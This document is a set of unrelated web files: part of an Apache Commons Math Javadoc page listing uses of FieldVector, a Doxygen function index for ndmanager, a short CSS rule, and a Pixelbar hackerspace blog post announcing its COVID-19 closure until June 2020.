org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html" title="type parameter in ArrayFieldVector">T</a>&gt;&nbsp;v)</code> <div class="block">Compute the outer product.</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldMatrix.html" title="interface in org.apache.commons.math3.linear">FieldMatrix</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/SparseFieldVector.html" title="type parameter in SparseFieldVector">T</a>&gt;</code></td> <td class="colLast"><span class="strong">SparseFieldVector.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/SparseFieldVector.html#outerProduct(org.apache.commons.math3.linear.FieldVector)">outerProduct</a></strong>(<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/SparseFieldVector.html" title="type parameter in SparseFieldVector">T</a>&gt;&nbsp;v)</code> <div class="block">Compute the outer product.</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldMatrix.html" title="interface in org.apache.commons.math3.linear">FieldMatrix</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="type parameter in FieldVector">T</a>&gt;</code></td> <td class="colLast"><span class="strong">FieldVector.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html#outerProduct(org.apache.commons.math3.linear.FieldVector)">outerProduct</a></strong>(<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="type parameter in FieldVector">T</a>&gt;&nbsp;v)</code> <div class="block">Compute the outer product.</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/FieldMatrix.html" title="type parameter in FieldMatrix">T</a>&gt;</code></td> <td class="colLast"><span class="strong">FieldMatrix.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/FieldMatrix.html#preMultiply(org.apache.commons.math3.linear.FieldVector)">preMultiply</a></strong>(<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/FieldMatrix.html" title="type parameter in FieldMatrix">T</a>&gt;&nbsp;v)</code> <div class="block">Returns the (row) vector result of premultiplying this by the vector <code>v</code>.</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/AbstractFieldMatrix.html" title="type parameter in AbstractFieldMatrix">T</a>&gt;</code></td> <td class="colLast"><span class="strong">AbstractFieldMatrix.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/AbstractFieldMatrix.html#preMultiply(org.apache.commons.math3.linear.FieldVector)">preMultiply</a></strong>(<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/AbstractFieldMatrix.html" title="type parameter in AbstractFieldMatrix">T</a>&gt;&nbsp;v)</code> <div class="block">Returns the (row) vector result of premultiplying this by the vector <code>v</code>.</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html" title="type parameter in ArrayFieldVector">T</a>&gt;</code></td> <td class="colLast"><span class="strong">ArrayFieldVector.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html#projection(org.apache.commons.math3.linear.FieldVector)">projection</a></strong>(<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html" title="type parameter in ArrayFieldVector">T</a>&gt;&nbsp;v)</code> <div class="block">Find the orthogonal projection of this vector onto another vector.</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/SparseFieldVector.html" title="type parameter in SparseFieldVector">T</a>&gt;</code></td> <td class="colLast"><span class="strong">SparseFieldVector.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/SparseFieldVector.html#projection(org.apache.commons.math3.linear.FieldVector)">projection</a></strong>(<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/SparseFieldVector.html" title="type parameter in SparseFieldVector">T</a>&gt;&nbsp;v)</code> <div class="block">Find the orthogonal projection of this vector onto another vector.</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="type parameter in FieldVector">T</a>&gt;</code></td> <td class="colLast"><span class="strong">FieldVector.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html#projection(org.apache.commons.math3.linear.FieldVector)">projection</a></strong>(<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="type parameter in FieldVector">T</a>&gt;&nbsp;v)</code> <div class="block">Find the orthogonal projection of this vector onto another vector.</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code>void</code></td> <td class="colLast"><span class="strong">BlockFieldMatrix.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/BlockFieldMatrix.html#setColumnVector(int, org.apache.commons.math3.linear.FieldVector)">setColumnVector</a></strong>(int&nbsp;column, <a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/BlockFieldMatrix.html" title="type parameter in BlockFieldMatrix">T</a>&gt;&nbsp;vector)</code> <div class="block">Set the entries in column number <code>column</code> as a vector.</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code>void</code></td> <td class="colLast"><span class="strong">FieldMatrix.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/FieldMatrix.html#setColumnVector(int, org.apache.commons.math3.linear.FieldVector)">setColumnVector</a></strong>(int&nbsp;column, <a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/FieldMatrix.html" title="type parameter in FieldMatrix">T</a>&gt;&nbsp;vector)</code> <div class="block">Set the entries in column number <code>column</code> as a vector.</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code>void</code></td> <td class="colLast"><span class="strong">AbstractFieldMatrix.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/AbstractFieldMatrix.html#setColumnVector(int, org.apache.commons.math3.linear.FieldVector)">setColumnVector</a></strong>(int&nbsp;column, <a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/AbstractFieldMatrix.html" title="type parameter in AbstractFieldMatrix">T</a>&gt;&nbsp;vector)</code> <div class="block">Set the entries in column number <code>column</code> as a vector.</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code>void</code></td> <td class="colLast"><span class="strong">BlockFieldMatrix.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/BlockFieldMatrix.html#setRowVector(int, org.apache.commons.math3.linear.FieldVector)">setRowVector</a></strong>(int&nbsp;row, <a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/BlockFieldMatrix.html" title="type parameter in BlockFieldMatrix">T</a>&gt;&nbsp;vector)</code> <div class="block">Set the entries in row number <code>row</code> as a vector.</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code>void</code></td> <td class="colLast"><span class="strong">FieldMatrix.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/FieldMatrix.html#setRowVector(int, org.apache.commons.math3.linear.FieldVector)">setRowVector</a></strong>(int&nbsp;row, <a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/FieldMatrix.html" title="type parameter in FieldMatrix">T</a>&gt;&nbsp;vector)</code> <div class="block">Set the entries in row number <code>row</code> as a vector.</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code>void</code></td> <td class="colLast"><span class="strong">AbstractFieldMatrix.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/AbstractFieldMatrix.html#setRowVector(int, org.apache.commons.math3.linear.FieldVector)">setRowVector</a></strong>(int&nbsp;row, <a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/AbstractFieldMatrix.html" title="type parameter in AbstractFieldMatrix">T</a>&gt;&nbsp;vector)</code> <div class="block">Set the entries in row number <code>row</code> as a vector.</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code>void</code></td> <td class="colLast"><span class="strong">ArrayFieldVector.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html#setSubVector(int, org.apache.commons.math3.linear.FieldVector)">setSubVector</a></strong>(int&nbsp;index, <a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html" title="type parameter in ArrayFieldVector">T</a>&gt;&nbsp;v)</code> <div class="block">Set a set of consecutive elements.</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code>void</code></td> <td class="colLast"><span class="strong">SparseFieldVector.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/SparseFieldVector.html#setSubVector(int, org.apache.commons.math3.linear.FieldVector)">setSubVector</a></strong>(int&nbsp;index, <a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/SparseFieldVector.html" title="type parameter in SparseFieldVector">T</a>&gt;&nbsp;v)</code> <div class="block">Set a set of consecutive elements.</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code>void</code></td> <td class="colLast"><span class="strong">FieldVector.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html#setSubVector(int, org.apache.commons.math3.linear.FieldVector)">setSubVector</a></strong>(int&nbsp;index, <a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="type parameter in FieldVector">T</a>&gt;&nbsp;v)</code> <div class="block">Set a set of consecutive elements.</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/FieldDecompositionSolver.html" title="type parameter in FieldDecompositionSolver">T</a>&gt;</code></td> <td class="colLast"><span class="strong">FieldDecompositionSolver.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/FieldDecompositionSolver.html#solve(org.apache.commons.math3.linear.FieldVector)">solve</a></strong>(<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/FieldDecompositionSolver.html" title="type parameter in FieldDecompositionSolver">T</a>&gt;&nbsp;b)</code> <div class="block">Solve the linear equation A &times; X = B for matrices A.</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html" title="type parameter in ArrayFieldVector">T</a>&gt;</code></td> <td class="colLast"><span class="strong">ArrayFieldVector.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html#subtract(org.apache.commons.math3.linear.FieldVector)">subtract</a></strong>(<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html" title="type parameter in ArrayFieldVector">T</a>&gt;&nbsp;v)</code> <div class="block">Compute <code>this</code> minus <code>v</code>.</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/SparseFieldVector.html" title="type parameter in SparseFieldVector">T</a>&gt;</code></td> <td class="colLast"><span class="strong">SparseFieldVector.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/SparseFieldVector.html#subtract(org.apache.commons.math3.linear.FieldVector)">subtract</a></strong>(<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/SparseFieldVector.html" title="type parameter in SparseFieldVector">T</a>&gt;&nbsp;v)</code> <div class="block">Compute <code>this</code> minus <code>v</code>.</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="type parameter in FieldVector">T</a>&gt;</code></td> <td class="colLast"><span class="strong">FieldVector.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html#subtract(org.apache.commons.math3.linear.FieldVector)">subtract</a></strong>(<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="type parameter in FieldVector">T</a>&gt;&nbsp;v)</code> <div class="block">Compute <code>this</code> minus <code>v</code>.</div> </td> </tr> </tbody> </table> <table border="0" cellpadding="3" cellspacing="0" summary="Use table, listing constructors, and an explanation"> <caption><span>Constructors in <a href="../../../../../../org/apache/commons/math3/linear/package-summary.html">org.apache.commons.math3.linear</a> with parameters of type <a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a></span><span class="tabEnd">&nbsp;</span></caption> <tr> <th class="colOne" scope="col">Constructor and Description</th> </tr> <tbody> <tr class="altColor"> <td class="colLast"><code><strong><a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html#ArrayFieldVector(org.apache.commons.math3.linear.FieldVector)">ArrayFieldVector</a></strong>(<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html" title="type parameter in ArrayFieldVector">T</a>&gt;&nbsp;v)</code> <div class="block">Construct a vector from another vector, using a deep copy.</div> </td> </tr> <tr class="rowColor"> <td class="colLast"><code><strong><a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html#ArrayFieldVector(org.apache.commons.math3.linear.FieldVector, org.apache.commons.math3.linear.FieldVector)">ArrayFieldVector</a></strong>(<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html" title="type parameter in ArrayFieldVector">T</a>&gt;&nbsp;v1, <a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html" title="type parameter in ArrayFieldVector">T</a>&gt;&nbsp;v2)</code> <div class="block">Construct a vector by appending one vector to another vector.</div> </td> </tr> <tr class="altColor"> <td class="colLast"><code><strong><a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html#ArrayFieldVector(org.apache.commons.math3.linear.FieldVector, org.apache.commons.math3.linear.FieldVector)">ArrayFieldVector</a></strong>(<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html" title="type parameter in ArrayFieldVector">T</a>&gt;&nbsp;v1, <a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html" title="type parameter in ArrayFieldVector">T</a>&gt;&nbsp;v2)</code> <div class="block">Construct a vector by appending one vector to another vector.</div> </td> </tr> <tr class="rowColor"> <td class="colLast"><code><strong><a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html#ArrayFieldVector(org.apache.commons.math3.linear.FieldVector, T[])">ArrayFieldVector</a></strong>(<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html" title="type parameter in ArrayFieldVector">T</a>&gt;&nbsp;v1, <a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html" title="type parameter in ArrayFieldVector">T</a>[]&nbsp;v2)</code> <div class="block">Construct a vector by appending one vector to another vector.</div> </td> </tr> <tr class="altColor"> <td class="colLast"><code><strong><a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html#ArrayFieldVector(T[], org.apache.commons.math3.linear.FieldVector)">ArrayFieldVector</a></strong>(<a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html" title="type parameter in ArrayFieldVector">T</a>[]&nbsp;v1, <a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html" title="type parameter in ArrayFieldVector">T</a>&gt;&nbsp;v2)</code> <div class="block">Construct a vector by appending one vector to another vector.</div> </td> </tr> </tbody> </table> </li> </ul> </li> </ul> </div> <!-- ======= START OF BOTTOM NAVBAR ====== --> <div class="bottomNav"><a name="navbar_bottom"> <!-- --> </a><a href="#skip-navbar_bottom" title="Skip navigation links"></a><a name="navbar_bottom_firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../../../../overview-summary.html">Overview</a></li> <li><a href="../package-summary.html">Package</a></li> <li><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">Class</a></li> <li class="navBarCell1Rev">Use</li> <li><a href="../package-tree.html">Tree</a></li> <li><a href="../../../../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../../../../index-all.html">Index</a></li> <li><a href="../../../../../../help-doc.html">Help</a></li> </ul> <div class="aboutLanguage"><em><script type="text/javascript" src="http://cdn.mathjax.org/mathjax/latest/MathJax.js?config=TeX-AMS-MML_HTMLorMML"></script></em></div> </div> <div class="subNav"> <ul class="navList"> <li>PREV</li> <li>NEXT</li> </ul> <ul class="navList"> <li><a href="../../../../../../index.html?org/apache/commons/math3/linear//class-useFieldVector.html" target="_top">FRAMES</a></li> <li><a href="FieldVector.html" target="_top">NO FRAMES</a></li> </ul> <ul class="navList" id="allclasses_navbar_bottom"> <li><a href="../../../../../../allclasses-noframe.html">All Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_bottom"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <a name="skip-navbar_bottom"> <!-- --> </a></div> <!-- ======== END OF BOTTOM NAVBAR ======= --> <p class="legalCopy"><small>Copyright &#169; 2003&#x2013;2015 <a href="http://www.apache.org/">The Apache Software Foundation</a>. All rights reserved.</small></p> </body> </html>
html/functions_func_0x66.html
neurosuite/ndmanager
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html><head><meta http-equiv="Content-Type" content="text/html;charset=iso-8859-1"> <title>ndmanager.kdevelop: Class Members - Functions</title> <link href="doxygen.css" rel="stylesheet" type="text/css"> <link href="tabs.css" rel="stylesheet" type="text/css"> </head><body> <!-- Generated by Doxygen 1.5.1 --> <div class="tabs"> <ul> <li><a href="index.html"><span>Main&nbsp;Page</span></a></li> <li><a href="namespaces.html"><span>Namespaces</span></a></li> <li id="current"><a href="annotated.html"><span>Classes</span></a></li> <li><a href="files.html"><span>Files</span></a></li> <li><a href="dirs.html"><span>Directories</span></a></li> </ul></div> <div class="tabs"> <ul> <li><a href="annotated.html"><span>Class&nbsp;List</span></a></li> <li id="current"><a href="functions.html"><span>Class&nbsp;Members</span></a></li> </ul></div> <div class="tabs"> <ul> <li><a href="functions.html"><span>All</span></a></li> <li id="current"><a href="functions_func.html"><span>Functions</span></a></li> </ul> </div> <div class="tabs"> <ul> <li><a href="functions_func.html#index_a"><span>a</span></a></li> <li><a href="functions_func_0x63.html#index_c"><span>c</span></a></li> <li><a href="functions_func_0x65.html#index_e"><span>e</span></a></li> <li id="current"><a href="functions_func_0x66.html#index_f"><span>f</span></a></li> <li><a href="functions_func_0x67.html#index_g"><span>g</span></a></li> <li><a href="functions_func_0x68.html#index_h"><span>h</span></a></li> <li><a href="functions_func_0x69.html#index_i"><span>i</span></a></li> <li><a href="functions_func_0x6b.html#index_k"><span>k</span></a></li> <li><a href="functions_func_0x6c.html#index_l"><span>l</span></a></li> <li><a href="functions_func_0x6d.html#index_m"><span>m</span></a></li> <li><a href="functions_func_0x6e.html#index_n"><span>n</span></a></li> <li><a href="functions_func_0x6f.html#index_o"><span>o</span></a></li> <li><a href="functions_func_0x70.html#index_p"><span>p</span></a></li> <li><a href="functions_func_0x72.html#index_r"><span>r</span></a></li> <li><a href="functions_func_0x73.html#index_s"><span>s</span></a></li> <li><a href="functions_func_0x75.html#index_u"><span>u</span></a></li> <li><a href="functions_func_0x77.html#index_w"><span>w</span></a></li> <li><a href="functions_func_0x78.html#index_x"><span>x</span></a></li> <li><a href="functions_func_0x7e.html#index_~"><span>~</span></a></li> </ul> </div> <p> &nbsp; <p> <h3><a class="anchor" name="index_f">- f -</a></h3><ul> <li>fileHasBeenModified() : <a class="el" href="classParameterView.html#7793c500546da77d68dbe8b3a791b114">ParameterView</a> <li>FileInformation() : <a class="el" href="classFileInformation.html#a30051a84e202e505041ab094f683d51">FileInformation</a> <li>fileModification() : <a class="el" href="classndManager.html#0cfb54deb6d2245be7582fdc687201d7">ndManager</a> , <a class="el" href="classParameterView.html#2685949e885eea4774242025c91ba9b4">ParameterView</a> , <a class="el" href="classFilesPage.html#8039683e119eb56090f2b134b0d44144">FilesPage</a> <li>FilePage() : <a class="el" href="classFilePage.html#fff9e25e557782fe8e6b0ab2cbbfa576">FilePage</a> </ul> <hr size="1"><address style="align: right;"><small>Generated on Sat Sep 15 16:04:45 2007 for ndmanager.kdevelop by&nbsp; <a href="http://www.doxygen.org/index.html"> <img src="doxygen.png" alt="doxygen" align="middle" border="0"></a> 1.5.1 </small></address> </body> </html>
templates/vivid/css/ie9-10.css
FabianodeLimaAbreu/conectby
#currency #virtuemart_currency_id { width: 160px !important; height:20px;margin:-2px 5px 0px 5px;padding:0px; }
_site/2020/03/15/Pixelbar-and-COVID-19/index.html
pixelbar/pixelbar.github.io
<!DOCTYPE html> <html lang="en-us"> <head> <link href="http://gmpg.org/xfn/11" rel="profile"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <!-- Enable responsiveness on mobile devices--> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1"> <title> Pixelbar and COVID-19 &middot; pixelbar </title> <meta content="pixelbar" property="og:site_name"> <meta content="Pixelbar and COVID-19" property="og:title"> <meta content="article" property="og:type"> <meta content="Hackerspace in Rotterdam, The Netherlands" property="og:description"> <meta content="http://localhost:4000/2020/03/15/Pixelbar-and-COVID-19/" property="og:url"> <meta content="2020-03-15T00:00:00+01:00" property="article:published_time"> <meta content="http://localhost:4000/about/" property="article:author"> <meta content="/img/logo-high-resolution.png" property="og:image"> <!-- CSS --> <link rel="stylesheet" href="/public/css/poole.css"> <link rel="stylesheet" href="/public/css/syntax.css"> <link rel="stylesheet" href="/public/css/lanyon.css"> <link rel="stylesheet" href="/public/fonts/ss-social/ss-social-circle.css"> <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=PT+Serif:400,400italic,700%7CPT+Sans:400"> <!-- Icons --> <link rel="apple-touch-icon-precomposed" sizes="144x144" href="/public/apple-touch-icon-precomposed.png"> <link rel="shortcut icon" href="/public/favicon.ico"> <!-- RSS --> <link rel="alternate" type="application/rss+xml" title="RSS" href="/atom.xml"> <!-- Scripts --> <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.1/jquery.min.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/fetch/0.10.1/fetch.min.js"></script> <script src="/public/scripts/main.js"></script> </head> <body> <!-- Target for toggling the sidebar `.sidebar-checkbox` is for regular styles, `#sidebar-checkbox` for behavior. --> <input type="checkbox" class="sidebar-checkbox" id="sidebar-checkbox"> <!-- Toggleable sidebar --> <div class="sidebar" id="sidebar"> <div class="sidebar-item"> <img id="logo" src="/public/logo.png"> <p>Hackerspace in Rotterdam, The Netherlands</p> </div> <nav class="sidebar-nav"> <a class="sidebar-nav-item" href="/">Home</a> <a class="sidebar-nav-item" href="/becomingamember/">Becoming a member</a> <a class="sidebar-nav-item" href="/contact/">Contact</a> <a class="sidebar-nav-item" href="/coronapolicy/">Corona Policy</a> <a class="sidebar-nav-item" href="/faq/">F.A.Q.</a> <a class="sidebar-nav-item" href="/history/">History</a> <a class="sidebar-nav-item" href="/houserules/">Regulations</a> <a class="sidebar-nav-item" href="/workshops/">Workshops</a> <a class="sidebar-nav-item" href="https://wiki.pixelbar.nl/index.php/Main_Page">Wiki</a> </nav> <div class="sidebar-item"> <a class="ss-icon" href="https://github.com/pixelbar" target="_blank">&#xF671;</a> <a class="ss-icon" href="https://facebook.com/pixelbar010" target="_blank">&#xF610;</a> <a class="ss-icon" href="https://twitter.com/pixelbar010" target="_blank">&#xF611;</a> <a class="ss-icon" href="https://reddit.com/r/pixelbar" target="_blank">&#xF616;</a> <a class="ss-icon" href="https://www.linkedin.com/company/6612405" target="_blank">&#xF612;</a> <a class="ss-icon" href="/atom.xml">&#xE310;</a> <a class="ss-icon" href="mailto:bestuur@pixelbar.nl">&#x2709;</a> </div> <div class="sidebar-item"> <p> &copy; 2020. All rights reserved. <a href="/responsibledisclosure" style="opacity: 0.6; font-size: 11px">Responsible Disclosure</a><br /> <a href="/privacystatement" style="opacity: 0.6; font-size: 11px">Privacy Statement</a> </p> </div> </div> <!-- Wrap is the content to shift when toggling the sidebar. We wrap the content to avoid any CSS collisions with our real content. --> <div class="wrap"> <div class="masthead"> <div class="container"> <h3 class="masthead-title"> <a href="/" title="Home">pixelbar</a> <small><span>is currently <span id="status"></span></span></small> </h3> </div> </div> <div class="container content"> <div class="post"> <h1 class="post-title">Pixelbar and COVID-19</h1> <span class="post-date">15 Mar 2020</span> <p>UPDATED (24-03-2020)</p> <p>After the recent press conference from the Dutch government, we have decided that Pixelbar will be closed to everyone. The closure lasts until June 1st. We hope for everyone’s understanding. As soon as there is further information, it will be shared via the known channels.</p> <hr /> <h2>Nederlandse Tekst</h2> <p>Naar aanleiding van de recente persconferentie van de Nederlandse overheid, Is besloten om Pixelbar in ieder geval tot 1 Juni te sluiten voor publiek en deelnemers. We rekenen hierbij op begrip van iedereen. Zodra er meer informatie beschikbaar komt, zal dit gedeeld worden via de bekende kanalen.</p> </div> <div class="related"> <h2>Related Posts</h2> <ul class="related-posts"> <li> <h3> <a href="/2020/11/06/Pixelbar-Goes-Online-Only/"> Pixelbar moves to online-only for now <small>06 Nov 2020</small> </a> </h3> </li> <li> <h3> <a href="/2020/06/17/Pixelbar-Re-Opening/"> Pixelbar re-opening <small>17 Jun 2020</small> </a> </h3> </li> <li> <h3> <a href="/2020/06/07/Pixelbar-Re-Opening-and-BBQ/"> Pixelbar re-opening and a BBQ <small>07 Jun 2020</small> </a> </h3> </li> </ul> </div> </div> </div> <label for="sidebar-checkbox" class="sidebar-toggle"></label> <script> (function(document) { var toggle = document.querySelector('.sidebar-toggle'); var sidebar = document.querySelector('#sidebar'); var checkbox = document.querySelector('#sidebar-checkbox'); document.addEventListener('click', function(e) { var target = e.target; if(!checkbox.checked || sidebar.contains(target) || (target === checkbox || target === toggle)) return; checkbox.checked = false; }, false); })(document); </script> <script src="/public/fonts/ss-social/ss-social.js"></script> </body> </html>
